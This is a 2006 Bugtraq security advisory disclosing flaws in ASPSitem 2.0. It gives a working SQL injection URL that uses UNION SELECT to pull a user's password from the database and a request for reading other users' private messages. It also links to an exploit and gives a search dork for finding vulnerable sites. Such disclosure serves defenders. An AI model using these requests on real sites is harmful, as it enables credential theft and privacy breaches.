Bugtraq mailing list archives

Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.

From: Mustafa Can Bjorn IPEKCI <nukedx () nukedx com>
Date: Sun, 28 May 2006 17:06:20 +0300

--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.

About: Via this method remote attacker can inject arbitrary SQLqueries to bid parameter in Anket.asp.Remote attacker also can read others private messages.The parameter idin Hesabim.asp did not sanitized properly

for checking the owner status of private message.
Level: Critical
---
How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]

EXAMPLE ->http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20

id%20like%201

with this example remote attacker can leak userid 1's logininformation from database.

Read others private messages ->

GET/EXAMPLE ->http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername

---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.

* 27/05/2006: Vendor already released patch for SQL injection you canfind it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710

--
Exploit: http://www.nukedx.com/?getxpl=39
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
---
Dorks: "Teşekkür ASPSitem"

Current thread:

Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities. Mustafa Can Bjorn IPEKCI (May 29)